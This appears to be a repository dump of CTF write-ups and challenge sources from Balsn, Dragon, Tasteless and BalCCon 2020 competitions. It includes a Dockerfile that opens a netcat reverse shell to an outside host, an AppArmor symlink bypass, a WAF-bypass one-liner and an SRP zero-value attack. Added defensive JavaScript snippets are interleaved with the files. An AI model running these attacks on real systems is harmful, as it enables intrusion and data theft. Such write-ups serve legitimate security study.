Tell me what do you want.\n") 24 | while True: 25 | print("[1] Generate key") 26 | print("[2] Get Encrypted flag") 27 | print("[3] Exit") 28 | opt = int(input(">>> ")) 29 | if opt == 1: 30 | p = generate_prime(1024) 31 | q = generate_prime(1024) 32 | e = 65537 33 | n = p*q 34 | key = RSA.construct((n, e)) 35 | print(key.exportKey('PEM').decode()) 36 | if opt == 2: 37 | if not key: 38 | print("No key generated :/") 39 | else: 40 | cipher = PKCS1_OAEP.new(key) 41 | print(binascii.hexlify(cipher.encrypt(flag)).decode()) 42 | if opt == 3: 43 | print("You are not obsessed enough :/") 44 | break 45 | print("\n") 46 | -------------------------------------------------------------------------------- /2020-09-25-BalCCon/README.md: -------------------------------------------------------------------------------- 1 | # BalCCon2k20 CTF 2 | 3 | Team: BitK, XeR, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Cryptsh (crypto)](cryptosh) 8 | * [Do U Have Knowledge (crypto)](do_u_have_knowledge) 9 | * [Katherine (crypto)](Katherine) 10 | * [RaKeeJaPassRPC (crypto)](RaKeeJaPassRPC) 11 | * [Mindgames 1336 (pwn)](mindgames_1336) 12 | * [Mindgames 1337 (pwn)](mindgames_1337) 13 | * [Mindgames 1338 (pwn)](mindgames_1338) 14 | * [heapmailer (pwn)](heapmailer) 15 | * [IoT Grill (pwn)](iot_grill) 16 | * [Turbo Blaise (rev)](turboblaise) 17 | * [shallweplayagame (rev)](shallweplayagame) 18 | * [RageQuit (rev)](ragequit) 19 | -------------------------------------------------------------------------------- /2020-09-25-BalCCon/RaKeeJaPassRPC/README.md: -------------------------------------------------------------------------------- 1 | # RaKeeJaPassRPC (crypto, 466p, 9 solved) 2 | 3 | ## Description 4 | 5 | In the task we get the [server source code](server.py) and we even got a full [client](client.py)! 6 | We can also connect to remote server, where this server is running. 7 | 8 | ## Code analysis 9 | 10 | I won't lie, the code looks pretty complex. 
11 | There is some complicated DH-like key exchange logic with some special token password, which by the power of math allows two sides to agree on a shared secret which is used to encrypt the flag. 12 | 13 | We spent some time going through the math here to understand how this all works, but it's really not useful in the end. 14 | The critical part is: 15 | 16 | ```python 17 | key = sha256(f'{S:X}'.encode()).digest() 18 | ``` 19 | 20 | The AES key is generated from the value `S`, which in turn comes from: 21 | 22 | ```python 23 | S = pow(A * pow(v, u, N), b, N) 24 | ``` 25 | 26 | Where `A` is the value we provide to the server. 27 | 28 | There is also a check on the value of: 29 | 30 | ```python 31 | M = sha256(f'{A:X}{B:X}{S:X}'.encode()).digest().hex() 32 | ``` 33 | 34 | But we provide `A`, and `B` is given to us by the server, hence again if we know `S` we can compute this value easily. 35 | 36 | ## Vulnerability 37 | 38 | Notice that the server never performs any checks on the value `A` we provided. 39 | It's simply taken directly into the computations. 40 | The issue here is similar to `invalid key` attacks. 41 | By using some special value, we can trick the server into creating a shared secret / authentication challenge which can be bypassed without knowing the token. 42 | 43 | If we look again at: 44 | 45 | ```python 46 | S = pow(A * pow(v, u, N), b, N) 47 | ``` 48 | 49 | It should be pretty obvious that if we were to send `A = 0` the value of `S` will also become `0`, regardless of all other parameters. 
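The degenerate secret described above, next to the server-side validation that prevents it. This is an added example, not the challenge's `server.py`: `N`, `g` and the server states are constructed toy values, the function names are hypothetical, and it goes slightly beyond the page by showing that every multiple of `N` behaves like `A = 0`.

```javascript
// Constructed toy parameters (assumptions, not the challenge's values).
const N = 2n ** 127n - 1n; // a known Mersenne prime used as the modulus
const g = 3n;              // constructed generator

// Square-and-multiply modular exponentiation on BigInt.
function modPow(base, exp, mod) {
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

// The page's formula: S = pow(A * pow(v, u, N), b, N), with A taken as-is.
function serverSecret(A, v, u, b) {
  return modPow(A * modPow(v, u, N), b, N);
}

// Same computation, but the client value is validated first:
// any A congruent to 0 mod N is refused before it reaches the exponentiation.
function serverSecretChecked(A, v, u, b) {
  const reduced = ((A % N) + N) % N;
  if (reduced === 0n) throw new RangeError("rejecting A: A mod N == 0");
  return serverSecret(reduced, v, u, b);
}

// The string the page feeds to sha256 for the AES key: f'{S:X}'.
function keyHashInput(S) {
  return S.toString(16).toUpperCase();
}

// Three constructed server states: verifier v, scrambling value u, ephemeral b.
const SERVER_STATES = [
  { v: 0x1f3a9c0de5b7n, u: 0x9e3779b97f4an, b: 0x2545f4914f6cdd1dn },
  { v: 0x0badc0ffee11n, u: 0x51ed270b3a55n, b: 0x6a09e667f3bcc908n },
  { v: 0x7777aaaa1234n, u: 0x0123456789abn, b: 0xbb67ae8584caa73bn },
];

// S as each constructed server state would compute it for one client value A.
function secretsForClientValue(A) {
  return SERVER_STATES.map(({ v, u, b }) => serverSecret(A, v, u, b));
}

const honestA = modPow(g, 0xc0ffeen, N);
console.log(secretsForClientValue(honestA).map(keyHashInput)); // differs per state
console.log(secretsForClientValue(0n).map(keyHashInput));      // "0" for every state
console.log(secretsForClientValue(2n * N).map(keyHashInput));  // multiples of N too
```

With the check in place the key no longer depends only on a value the client chose; SRP-6a specifies the same abort when `A % N == 0`.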
50 | 51 | ## Solver 52 | 53 | We can just take the provided client, set `A = 0` and `S = 0` and run it to get back the flag: `BCTF{y0u_w0uldnt_impl3m3nt_y0ur_0wn_crypt0}` 54 | -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/711/README.md: -------------------------------------------------------------------------------- 1 | # 7-11 (stegano, 100p, 138 solved) 2 | 3 | ## Description 4 | 5 | In the task we get a [7 zip archive](challenge.7z) and there are 2 flags hidden there. 6 | For the second part see `7-12` writeup. 7 | 8 | ## Archive analysis 9 | 10 | ### ZIP content 11 | 12 | We start off by simply checking what's in the archive, and there is one file `password.txt` with: 13 | 14 | ``` 15 | _ _ _ __ _ 16 | __ _(_)_ _____ _ __ ___ ___ | |_| |__ ___ / _| | __ _ __ _ 17 | / _` | \ \ / / _ \ | '_ ` _ \ / _ \ | __| '_ \ / _ \ | |_| |/ _` |/ _` | 18 | | (_| | |\ V / __/ | | | | | | __/ | |_| | | | __/ | _| | (_| | (_| | 19 | \__, |_| \_/ \___|___|_| |_| |_|\___|___\__|_| |_|\___|___|_| |_|\__,_|\__, | 20 | |___/ |_____| |_____| |_____| |___/ 21 | 22 | ``` 23 | 24 | So we have some password `give_me_the_flag`, now we just need to use it somewhere. 25 | It's interesting that this archive is so big (151KB) and has only a small file inside... 26 | 27 | If we peek inside via hexeditor or run `binwalk` we can see that there is another 7zip archive glued to the first one. 28 | 29 | ### Second archive 30 | 31 | We can cut-out the second [archive](challenge2.7z) and unpack it using the provided password. 32 | From this we get the first flag: `tstlss{next_header_offset_is_a_nice_feature}` which is also a hint for second stage, and also input files for the second stage. 
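A check for the situation found above, data glued after a 7z archive, written as an added example that is not part of the original write-up. It reads the 32-byte 7z signature header (`NextHeaderOffset` at byte 12, `NextHeaderSize` at byte 20, both little-endian) to compute where the archive says it ends; the sample bytes are constructed toy data with zeroed CRCs, the function names are hypothetical, and it assumes the appended archive starts right at that declared end.

```javascript
const MAGIC = [0x37, 0x7a, 0xbc, 0xaf, 0x27, 0x1c]; // "7z" BC AF 27 1C
const START_HEADER_LEN = 32; // magic(6) version(2) crc(4) offset(8) size(8) crc(4)

function hasMagicAt(bytes, off) {
  return off + MAGIC.length <= bytes.length && MAGIC.every((m, i) => bytes[off + i] === m);
}

// binwalk-style scan: every offset where a 7z signature occurs.
function findSignatures(bytes) {
  const hits = [];
  for (let i = 0; i + MAGIC.length <= bytes.length; i++) {
    if (hasMagicAt(bytes, i)) hits.push(i);
  }
  return hits;
}

// Compare the end of the archive declared by its header with the real file size.
function inspectSevenZip(bytes) {
  if (bytes.length < START_HEADER_LEN || !hasMagicAt(bytes, 0)) {
    throw new Error("no 7z signature header at offset 0");
  }
  const view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  const declaredEnd =
    BigInt(START_HEADER_LEN) + view.getBigUint64(12, true) + view.getBigUint64(20, true);
  if (declaredEnd > BigInt(bytes.length)) {
    // Header points past the end of the file: truncated or corrupted archive.
    return { declaredEnd: null, truncated: true, trailingBytes: 0, trailingIsSevenZip: false };
  }
  const end = Number(declaredEnd);
  return {
    declaredEnd: end,
    truncated: false,
    trailingBytes: bytes.length - end,          // > 0 means something was appended
    trailingIsSevenZip: hasMagicAt(bytes, end), // appended data is itself a 7z archive
  };
}

// Constructed sample: a header with valid offsets, filler bytes instead of real
// packed streams, CRC fields left at zero (this example does not verify them).
function buildToyArchive(bodyLen, nextHeaderLen) {
  const out = new Uint8Array(START_HEADER_LEN + bodyLen + nextHeaderLen).fill(0xaa);
  out.fill(0, 0, START_HEADER_LEN);
  out.set(MAGIC, 0);
  out[7] = 4; // format version 0.4
  const view = new DataView(out.buffer);
  view.setBigUint64(12, BigInt(bodyLen), true);
  view.setBigUint64(20, BigInt(nextHeaderLen), true);
  return out;
}

function concat(a, b) {
  const out = new Uint8Array(a.length + b.length);
  out.set(a, 0);
  out.set(b, a.length);
  return out;
}

const glued = concat(buildToyArchive(10, 6), buildToyArchive(4, 2));
console.log(inspectSevenZip(glued));
console.log(findSignatures(glued));
```

A large archive with a tiny payload, as noticed in the write-up, shows up here as a non-zero `trailingBytes`.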
33 | -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/711/challenge.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-10-03-TastelessCTF/711/challenge.7z -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/711/challenge2.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-10-03-TastelessCTF/711/challenge2.7z -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/712/fixed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-10-03-TastelessCTF/712/fixed.png -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/712/raw_out.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-10-03-TastelessCTF/712/raw_out.png -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/BabypadV2/chall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import socketserver 3 | from secrets import flag 4 | import struct 5 | 6 | # We implemented a true RNG which hands us cryptographically secure double-precision 7 | # floats measured directly from our quantum flux generator. 
8 | import trng 9 | 10 | 11 | def to_bytes(gen): 12 | for value in gen: 13 | yield from struct.pack("d", value) 14 | 15 | 16 | def xor(a, b): 17 | for _a, _b in zip(a, b): 18 | yield _a ^ _b 19 | 20 | class ThreadingTDPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): 21 | pass 22 | 23 | class Handler(socketserver.BaseRequestHandler): 24 | def handle(self): 25 | keystream = to_bytes(trng.keystream()) 26 | while True: 27 | count = int(self.request.recv(4)) 28 | 29 | for _ in range(count): 30 | ct = bytes(xor(flag, keystream)) 31 | self.request.sendall(ct) 32 | 33 | self.request.close() 34 | 35 | 36 | if __name__ == "__main__": 37 | HOST, PORT = "0.0.0.0", 1337 38 | 39 | with ThreadingTDPServer((HOST, PORT), Handler) as server: 40 | server.serve_forever() 41 | -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/README.md: -------------------------------------------------------------------------------- 1 | # Tasteless CTF 2020 2 | 3 | Team: BitK, XeR, SakiiR, SIben, terjanq, shalom 4 | 5 | ### Table of contents 6 | 7 | * [7-11 (stegano)](711) 8 | * [7-12 (stegano)](712) 9 | * [BabypadV2 (crypto)](BabypadV2) 10 | * [Petition (crypto/zajebiste)](petition) 11 | -------------------------------------------------------------------------------- /2020-10-03-TastelessCTF/petition/Challenge.java: -------------------------------------------------------------------------------- 1 | import java.math.BigInteger; 2 | import java.security.spec.DSAPublicKeySpec; 3 | import java.security.KeyFactory; 4 | import java.security.Signature; 5 | import java.util.Random; 6 | import java.util.Scanner; 7 | import java.util.Base64; 8 | import java.io.File; 9 | 10 | public class Challenge { 11 | public static void main(String[] args) throws Exception { 12 | 13 | // Petition group params 14 | var p = new BigInteger("1732afa753c06fd916345a525ede89ba9d78a0a8b", 16); 15 | var q = new BigInteger("b9957d3a9e037ec8b1a2d292f6f44dd4ebc50545", 
16); 16 | var g = new BigInteger("4"); 17 | 18 | // Read input 19 | System.out.println("We heard some people may be interested in seeing certain flags."); 20 | System.out.println("If you can get a petition signed by at least 100 people, we will reveal our flag."); 21 | System.out.println("Please submit your petition:"); 22 | var petition = Base64.getDecoder().decode(new Scanner(System.in).next()); 23 | var message = "We want to see the flag!".getBytes(); 24 | 25 | for (int i = 0; i < 100; i++) { 26 | 27 | // Create a new key 28 | BigInteger x; 29 | do { 30 | x = new BigInteger(q.bitLength(), new Random()); 31 | } while (q.compareTo(x) <= 0); 32 | var y = g.modPow(x, p); 33 | var publicKeySpec = new DSAPublicKeySpec(y, p, q, g); 34 | var keyFactory = KeyFactory.getInstance("DSA"); 35 | var publicKey = keyFactory.generatePublic(publicKeySpec); 36 | 37 | // Verify signature 38 | var signature = Signature.getInstance("SHA1withDSA"); 39 | signature.initVerify(publicKey); 40 | signature.update(message); 41 | if (!signature.verify(petition)) { 42 | System.out.println("This petition looks fraudulent!"); 43 | return; 44 | } 45 | } 46 | 47 | System.out.println("OK, this has been signed by at least 100 people!"); 48 | System.out.println(new Scanner(new File("flag.txt")).nextLine()); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/README.md: -------------------------------------------------------------------------------- 1 | # Balsn CTF 2020 2 | 3 | Team: BitK, johncool, Posix, SakiiR, Sebbb, shalom, SIben, XeR 4 | 5 | ### Table of contents 6 | 7 | * [TPC (web)](tpc) 8 | * [L5D (web)](l5d) 9 | * [Welcome2BalsnCTF (web)](welcome2balsnctf) 10 | * [The Woven Web (web)](the_woven_web) 11 | * [Windows XP Media Player (web)](windows_xp_media_player) 12 | * [Transformer: The Guardian Knight (misc)](transformer) 13 | * [The Last Bitcon (misc)](last_bitcon) 14 | * [Show your Patience and Intelligence II 
(misc)](patience2) 15 | * [babyrev (re)](babyrev) 16 | -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/last_bitcon/README.md: -------------------------------------------------------------------------------- 1 | # The Last Bitcon - Balsn CTF 2020 (misc, 238p, 50 solved) 2 | ## Introduction 3 | 4 | This challenge consists of a single Python script. 5 | The script is a proof-of-work. It generates a prefix and asks for a string that, 6 | once hashed in `sha256`, starts with 200 bits set to 0. 7 | 8 | ## Fuzzing 9 | The script does not look vulnerable, but it has to be. 10 | A bash one-liner was used to send random bytes (from `/dev/urandom`) to see how 11 | the remote service behaves. 12 | ```shell 13 | % (head -c $((0x80)) /dev/urandom; cat) | nc the-last-bitcoin.balsnctf.com 7123 14 | 15 | sha256(GJbkiuJabiZpRkMA + ???) == 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000(200)... 16 | 17 | ??? = 18 | There you go: 19 | BALSN{Taiwan_can_help_solve_sha256} 20 | ``` 21 | 22 | **Flag**: `BALSN{Taiwan_can_help_solve_sha256}` 23 | -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/the_woven_web/README.md: -------------------------------------------------------------------------------- 1 | # The Woven Web (web, 766p, 6 solves) 2 | 3 | The Woven Web is a client-side web challenge. 4 | An endpoint is provided to make a headless chrome browse a user-specified page. 5 | The flag is stored in a `FLAG` constant in the server-side code. 6 | 7 | It is possible to download a file in the headless browser by making the browser go to the following page: 8 | 9 | ```html 10 | 11 | 14 | ``` 15 | 16 | The file will be downloaded and stored in `/home/user/Downloads/` 17 | It can then be access via the `file://` schema. 
18 | This file can include the file containing the flag with ` 41 | 42 | 45 | ``` -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/tpc/files/challenge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-14-BalsnCTF/tpc/files/challenge.png -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/tpc/files/object-containing-flag.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-14-BalsnCTF/tpc/files/object-containing-flag.tar.gz -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/transformer/README.md: -------------------------------------------------------------------------------- 1 | # Transformer: The Guardian Knight - Balsn CTF 2020 (misc, 626p, 10 solved) 2 | ## Introduction 3 | 4 | This challenge implements a web server in NodeJS. 5 | 6 | This web server sends a flag : 7 | ```javascript 8 | const server = http.createServer((req, res) => { 9 | res.writeHead(200, { 'Content-Type': 'text/plain' }); 10 | res.end(`The flag is ${flag}.`); 11 | }); 12 | ``` 13 | 14 | There is a Web-Application Firewall that prevents the flag from being sent : 15 | ```javascript 16 | class WAF extends Transform { 17 | _transform (data, encoding, callback) { 18 | data = data.toString('ascii').replace(/BALSN{([^}]*)/g, (m, c) => 19 | 'BALSN{' + Array(c.length).fill('REDACTED_').join('').slice(0, c.length) 20 | ) 21 | callback(null, data) 22 | } 23 | }; 24 | ``` 25 | 26 | ## Attack 27 | 28 | HTTP/1.1 supports requests pipelining, e.g. it is possible to send multiple 29 | requests before the server sends a response. 
30 | 31 | Answering a large number of requests will fill an internal buffer on the server. The 32 | WAF will then read from this buffer. Since only a fixed number of bytes will be 33 | read by the WAF, it is possible to fill this buffer up to a point where the WAF 34 | will read an incomplete flag. The filter will thus not mask the flag. 35 | 36 | ```shell 37 | yes $'GET / HTTP/1.1\r\n\r' | nc waf.balsnctf.com 8889 \ 38 | | fgrep flag \ 39 | | fgrep -v REDACTED 40 | ``` 41 | 42 | **Flag**: `BALSN{!+-WTF_is_this_WAF-+!}` 43 | -------------------------------------------------------------------------------- /2020-11-14-BalsnCTF/welcome2balsnctf/files/upload_95073691eadf0992593e82c3b59faeea.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-14-BalsnCTF/welcome2balsnctf/files/upload_95073691eadf0992593e82c3b59faeea.png -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/README.md: -------------------------------------------------------------------------------- 1 | # Dragon CTF 2020 2 | 3 | Team: BitK, Posix, SakiiR, Sebbb, Shalom, SIben, XeR, mastho 4 | 5 | ### Table of contents 6 | 7 | * [Scratchpad (web)](scratchpad) 8 | * [Harmony Chat (web)](harmony_chat) 9 | * [RetroZeit (re)](retrozeit) 10 | * [Bit Flip 1 (crypto)](bitflip1) 11 | * [Bit Flip 3 (crypto)](bitflip3) 12 | * [Heap-Hop (Pwning)](heap-hop) 13 | * [AppArmor2 (Sandbox)](apparmor2) 14 | * [Look up the flag (Network)](lookup_the_flag) 15 | * [CoolNAME Checker (Network)](coolname_checker) 16 | * [babyshell (Miscellaneous)](babyshell) 17 | -------------------------------------------------------------------------------- /2020-11-22-DragonCTF/apparmor2/README.md: -------------------------------------------------------------------------------- 1 | # AppArmor2 - Dragon CTF 2020 (Sandbox, 421p, 7 solved) 2 | 3 | ## Introduction 4 | AppArmor2 
is a sandbox task. 5 | 6 | A remote server executes user-provided Docker containers with a specific 7 | AppArmor ruleset which prevents reading `/flag*`: 8 | ``` 9 | # The line below (+ profile name, + install comments at bottom) is only difference from the original file 10 | deny /flag* rwklx, 11 | ``` 12 | 13 | The rule prevents (`deny`) the file from being read (`r`), written (`w`), locked 14 | (`k`), linked (`l`) or executed (`x`). 15 | 16 | The flag is mounted as `/flag-XXXX` with X being random hexadecimal digits. It 17 | cannot be read because of the AppArmor rule. 18 | 19 | ## Vulnerability 20 | If the target of a mount operation already exists and is a symbolic link, the 21 | flag will be mounted as the target of this link. 22 | 23 | It is possible to create a container that contains a symbolic link at every 24 | possible flag path, each pointing to `/pwned`. 25 | 26 | The flag will be mounted as `/pwned`. Since this file is not restricted by the 27 | AppArmor rule, the flag will be readable with a simple `cat /pwned` command. 28 | 29 | Creating an image and pushing it to the Gitlab repository is out of the scope of 30 | this write-up. 

**Flag**: `DrgnS{4e77cd33ffb0c7802b39303f7452fd90}`

## Appendices
### Dockerfile
```Dockerfile
FROM busybox
RUN printf 'ln -s /pwned /flag-%04x\n' $(seq 65535) | sh
CMD ["nc", "xer.fr", "12345", "-e", "/bin/sh"]
```

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/harmony_chat/files/harmony.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/harmony_chat/files/harmony.zip

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/harmony_chat/files/main.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/harmony_chat/files/main.png

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/retrozeit/retrozeit:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/retrozeit/retrozeit

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/scratchpad/files/flag.png

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/home.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/scratchpad/files/home.png

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/img-src.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/scratchpad/files/img-src.png

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/main.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-11-22-DragonCTF/scratchpad/files/main.png

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/package.json:
--------------------------------------------------------------------------------
{
  "name": "task",
  "private": true,
  "scripts": {
    "serve": "ts-node serve.ts",
    "setup": "ts-node setup.ts",
    "watch": "ts-node watch.ts"
  },
  "dependencies": {
    "@types/bcrypt": "^3.0.0",
    "@types/body-parser": "^1.19.0",
    "@types/csurf": "^1.9.36",
    "@types/express": "^4.17.8",
    "@types/express-session": "^1.17.0",
    "@types/http-errors": "^1.8.0",
    "@types/massive": "^5.4.3",
    "@types/morgan": "^1.9.2",
    "@types/selenium-webdriver": "^4.0.10",
    "bcrypt": "^5.0.0",
    "body-parser": "^1.19.0",
    "csurf": "^1.11.0",
    "debug": "^4.2.0",
    "express": "^4.17.1",
    "express-session": "^1.17.1",
    "http-errors": "^1.8.0",
    "massive": "^6.6.1",
    "memorystore": "^1.6.4",
    "morgan": "^1.10.0",
    "pg": "^8.4.2",
    "pug": "^3.0.0",
    "selenium-webdriver": "^4.0.0-alpha.7",
    "ts-node": "^9.0.0",
    "typescript": "^4.1.2"
  }
}

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/routes/index.ts:
--------------------------------------------------------------------------------
import * as express from 'express';
import utils from '../utils';


const router = express.Router();

router.get('/', (_req, res) => res.render('index'));
router.get(
    '/logout', (req, res) => utils.signOut(req, () => res.redirect('/')));
router.get('/login', (_req, res) => res.render('login', {title: 'Log in'}));
router.post('/login', async (req, res) => {
  const user = await res.locals.db.users.findOne({name: req.body.name});
  if (!user || !utils.checkPassword(user, req.body.password)) {
    return res.render(
        'login', {title: 'Log in', error: 'Invalid username or password'});
  }

  utils.signIn(req, user);
  res.redirect('/notes');
});

router.get(
    '/register', (_req, res) => res.render('register', {title: 'Register'}));
router.post('/register', async (req, res) => {
  const regexp = /^\s*$/;
  let errors = [];

  if (regexp.test(req.body.name)) {
    errors.push(`Username can't be empty.`);
  }

  if (regexp.test(req.body.password)) {
    errors.push(`Password can't be empty.`);
  }

  if (req.body.password !== req.body.password_confirmation) {
    errors.push(`Password doesn't match the confirmation.`);
  }

  if (errors.length !== 0) {
    return res.render('register', {title: 'Register', error: errors.join(' ')});
  }

  try {
    await res.locals.db.users.insert(
        {name: req.body.name, password: utils.hashPassword(req.body.password)});
  } catch (err) {
    return res.render(
        'register', {title: 'Register', error: 'User already exists'});
  }

  return res.redirect('/login');
});

export default router;

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/schema.sql:
--------------------------------------------------------------------------------
create extension if not exists pgcrypto;
create table if not exists users (id UUID PRIMARY KEY DEFAULT gen_random_uuid(), name TEXT UNIQUE NOT NULL, password TEXT NOT NULL);
create table if not exists notes (id UUID PRIMARY KEY DEFAULT gen_random_uuid(), user_id UUID NOT NULL REFERENCES users(id) ON DELETE CASCADE, title TEXT NOT NULL, content TEXT NOT NULL, favourite BOOLEAN DEFAULT FALSE);
create table if not exists reports (id UUID UNIQUE NOT NULL REFERENCES notes(id) ON DELETE CASCADE);
create index if not exists index_notes_on_user_ids on notes(user_id) include (title, content);

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/setup.ts:
--------------------------------------------------------------------------------
import * as assert from 'assert';
import * as massive from 'massive';
import utils from './utils';

assert.ok(process.env.ADMIN_PASSWORD, "ADMIN_PASSWORD is not set");
assert.ok(process.env.FLAG, "FLAG is not set");
assert.ok(process.env.DB, "DB is not set");

async function main() {
  const db = await massive(process.env.DB);
  const user = await db.users.insert({name: 'admin', password: utils.hashPassword(process.env.ADMIN_PASSWORD)}).catch(console.log);
  await db.notes.insert({user_id: user.id, title: "Flag", content: process.env.FLAG, favourite: true});
}

main();

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/static/star.svg:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/utils.ts:
--------------------------------------------------------------------------------
import { hashSync, compareSync, genSaltSync } from 'bcrypt';
import { Request, Response, NextFunction } from 'express';

export default class Utils {
  static hashPassword(password: string): string {
    return hashSync(password, genSaltSync());
  }

  static checkPassword(user: any, password: string): boolean {
    return compareSync(password, user.password);
  }

  static signIn(req: Request, user: any) {
    req.session.userId = user.id;
  }

  static signOut(req: Request, next: NextFunction) {
    req.session.destroy(next);
  }

  static checkAuth(req: Request, res: Response, next: NextFunction): any {
    if (!req.session.userId) {
      return res.redirect('/login');
    }
    next();
  }
}

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/views/edit.pug:
--------------------------------------------------------------------------------
extends layout

block title
  | Edit Note

block content
  form.form(action=`/notes/${note.id}/edit`, method='POST')
    input(type='hidden', name='_csrf', value=csrfToken)
    div.mb-3
      input.form-control(type='text', name='title', placeholder='Title', value=note.title)
    div.mb-3
      textarea.form-control(name='content', placeholder='Content', rows=20) #{note.content}
    div.mb-3
      div.form-check
        input.form-check-input(name='favourite', type='checkbox', id='favourite', checked=!!note.favourite)
        label.form-check-label(for='favourite') Favourite
    div.mb-3
      button.btn.btn-lg.btn-primary.btn-block(type='submit') Update

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/views/error.pug:
--------------------------------------------------------------------------------
extends layout

block content
  h1= status
  h2= message

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/views/index.pug:
--------------------------------------------------------------------------------
extends layout

block content
  .jumbotron.jumbotron-fluid
    .container
      h1.display-4 Scratchpad
      p.lead Welcome to a simple scratchpad!
      p Report any bugs you find. Best reports will be rewarded.

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/views/layout.pug:
--------------------------------------------------------------------------------
doctype html
html(lang="en")
  head
    meta(charset="utf-8")
    title
      block title
        | Scratchpad
    link(rel='stylesheet', href='/static/bootstrap.min.css', integrity='sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2', crossorigin='anonymous')
  body
    header
      nav.navbar.navbar-dark.bg-dark.navbar-expand-lg
        a.navbar-brand(href='/') Scratchpad

        if session && session.userId
          ul.navbar-nav.mr-auto
            li.nav-item
              a.nav-link(href='/notes') Your Notes
            li.nav-item
              a.nav-link(href='/notes/new') Add Note
            li.nav-item
              a.nav-link(href='/logout') Logout
          form.form-inline(action='/notes')
            input.form-control.mr-sm-2(type="search", name="q", placeholder="Search", value=query)
        else
          ul.navbar-nav.mr-auto
            li.nav-item
              a.nav-link(href='/register') Register
            li.nav-item
              a.nav-link(href='/login') Login

    main.py-5.bg-light(role='main')
      .container
        if error
          .alert.alert-danger= error

        if notice
          .alert.alert-success= notice

        block content

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/views/login.pug:
--------------------------------------------------------------------------------
extends layout

block content
  form.form-signin(action='/login', method='POST')
    input(type='hidden', name='_csrf', value=csrfToken)
    .mb-3
      input.form-control(id='name', type='text', name='name', placeholder='Username')
    .mb-3
      input.form-control(id='password', type='password', name='password', placeholder='Password')
    .mb-3
